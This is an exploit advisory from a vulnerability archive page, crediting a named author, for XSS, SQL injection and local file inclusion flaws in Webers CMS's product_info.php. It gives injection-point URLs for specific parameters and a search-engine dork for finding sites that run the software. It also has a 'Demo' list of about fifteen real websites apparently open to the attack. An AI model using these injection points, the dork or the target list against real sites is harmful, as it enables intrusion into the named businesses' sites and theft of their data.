Webers CMS XSS / LFI / SQL Injection

2013.11.07
Credit: Hossein Hezami
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
CWE-98

######################################################################## # # Exploit Title: Webers CMS Multiple Vulnerability # Date: 2013 5 November # Author: Hossein Hezami ( Dr.3v1l ) # Vendor: http://www.webers.gr # Version: All Version # Security Risk: High # Category: WebApps # Google Keywords: intext:"created by Webers" site:gr # Tested on: Linux # ######################################################################## # # [~] Exploit : XSS / SQL Injection / LFI / Path disclosure Vulnerability # # XSS : xss in product_info.php file => parametrs : lang , cPath , products_id # # http://<server>/product_info.php?cust_id=&template_id=&lang=gr[XSS]&cPath=[XSS]&template_id=website&cPath=[XSS]&from=sitemap&products_id=[XSS] # # SQL Injection : sql injection in product_info.php file => parametrs : lang , cPath , products_id # # http://<server>/product_info.php?cust_id=&template_id=&lang=gr[SQL-Injection]&cPath=[SQL-Injection]&template_id=website&cPath=[SQL-Injection]&from=sitemap&products_id=[SQL-Injection] # # LFI : lfi in product_info.php file => parametr : to # # http://<server>/product_info.php?cust_id=&template_id=&lang=en&cPath=&to=[LFI] # # And To All Parametrs have "Path disclosure" ;) # ######################################################################## # # [~] Demo : # # http://bofrost.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=&template_id=website&cPath=&from=sitemap&products_id=123 # http://eyzein-aet.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=&template_id=website&cPath=&from=sitemap&products_id=123 # http://dellarte.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&cPath=&from=sitemap&products_id=3 # http://etiroll.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://forahellas.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://mete.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://ktirio3.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://e-fitnessclub.gr/website/product_info.php?cust_id=&template_id=&lang=gr&cPath=6_100_227&products_id=1578 # http://analycon.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://mavros.com.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=2 # http://normabox.gr/website/product_info.php?template_id=38&lang=gr&cPath=&from=sitemap&products_id=1 # http://fotiadis.com.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&cPath=&from=sitemap&products_id=2 # http://rbt.gr/website/product_info.php?template_id=38&lang=gr&cPath=&to=homepage.php # http://iliosstudios.gr/website/product_info.php?cust_id=&template_id=&lang=en&cPath=&to=index.php # http://oaveroias.gr/website/product_info.php?cust_id=&template_id=&lang=&cPath=&cPath=-2&from=sitemap&newid=all # ######################################################################## # # [~] Contact Me : # # Teacher.3v1l@live.com # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.LinkedIN.com/in/Hossein3v1l # # http://0websecurity.ir # Black_Devils B0ys ########################################################################

References:

intext:"created by Webers" site:gr


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top